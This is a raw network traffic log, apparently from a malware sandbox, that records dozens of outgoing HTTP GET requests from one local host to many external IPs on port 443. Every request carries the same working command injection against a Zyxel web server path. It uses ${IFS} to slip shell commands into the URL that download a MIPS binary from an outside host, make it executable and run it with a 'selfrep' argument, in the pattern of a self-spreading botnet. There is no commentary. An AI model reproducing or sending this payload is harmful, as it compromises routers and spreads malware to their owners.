                                                      Feb 2, 2024 06:36:03.869750023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7145192.168.2.144128654.141.175.250443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869776011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7146192.168.2.1453326161.48.221.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869816065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7147192.168.2.1452602154.172.251.244443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869843006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7148192.168.2.1435398102.229.96.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869899988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7149192.168.2.144175860.119.207.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869951963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7150192.168.2.1453328121.210.95.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.869998932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7151192.168.2.1458260147.126.8.14443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870029926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7152192.168.2.1446392190.177.149.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870086908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7153192.168.2.144640649.214.72.48443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870146036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7154192.168.2.1435422110.156.81.245443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870170116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7155192.168.2.1434132200.149.98.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870213032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7156192.168.2.145310865.17.44.249443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870255947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7157192.168.2.143585878.106.236.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870280027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7158192.168.2.145436858.124.112.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870327950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7159192.168.2.1456660179.63.57.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870377064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7160192.168.2.1451364167.115.99.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870408058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7161192.168.2.145871066.192.22.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870452881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7162192.168.2.145115885.12.187.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870492935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7163192.168.2.1453282107.254.204.60443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870533943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7164192.168.2.1438390129.184.253.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870565891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7165192.168.2.1459240151.173.97.243443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870599031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7166192.168.2.1455324109.128.135.176443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870636940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7167192.168.2.145263420.178.251.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870675087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7168192.168.2.1441878197.170.56.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870706081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7169192.168.2.143353875.250.141.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870742083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7170192.168.2.1460518178.126.4.33443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870789051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7171192.168.2.143581097.37.251.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870836020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7172192.168.2.1442780205.215.134.166443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870874882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7173192.168.2.145980883.250.194.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870910883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7174192.168.2.1451918159.219.65.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870940924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7175192.168.2.1438992220.187.230.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.870976925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7176192.168.2.14432742.20.66.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871015072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7177192.168.2.1448488132.136.29.62443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871063948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7178192.168.2.1448502197.44.236.217443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871108055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7179192.168.2.1452528168.129.170.5443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871125937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7180192.168.2.1436338174.126.46.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871165991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7181192.168.2.1442816164.196.74.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871212959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7182192.168.2.145056067.228.172.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871259928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7183192.168.2.145593017.50.18.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871288061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7184192.168.2.1439164188.31.13.136443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871345997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7185192.168.2.143870469.132.146.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871380091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7186192.168.2.145308683.73.50.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871433020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7187192.168.2.145612843.136.90.6443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871469021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7188192.168.2.1438708106.249.122.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871500969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7189192.168.2.143616646.155.69.134443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871547937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7190192.168.2.1452964147.112.29.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871603966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7191192.168.2.1457998196.60.143.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871628046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7192192.168.2.1437508208.35.178.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871680021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7193192.168.2.1456378196.51.36.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871715069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7194192.168.2.143287854.213.48.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871747971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7195192.168.2.1441528124.194.157.0443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871798992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7196192.168.2.146012892.22.168.161443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871833086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7197192.168.2.1445524193.101.216.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871877909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7198192.168.2.144397661.40.203.46443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871901989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7199192.168.2.143537459.21.50.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871953964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7200192.168.2.1443888121.128.189.241443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.871990919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7201192.168.2.143766480.5.21.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.872035027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7202192.168.2.143760251.102.121.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.872067928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7203192.168.2.145209835.119.77.26443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.872113943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7204192.168.2.144068653.182.46.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.872144938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7205192.168.2.1445364135.83.108.220443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.872210979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7206192.168.2.143323035.230.4.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:03.872240067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      7207192.168.2.145787234.245.177.37443
                                                      TimestampBytes transferredDirectionData
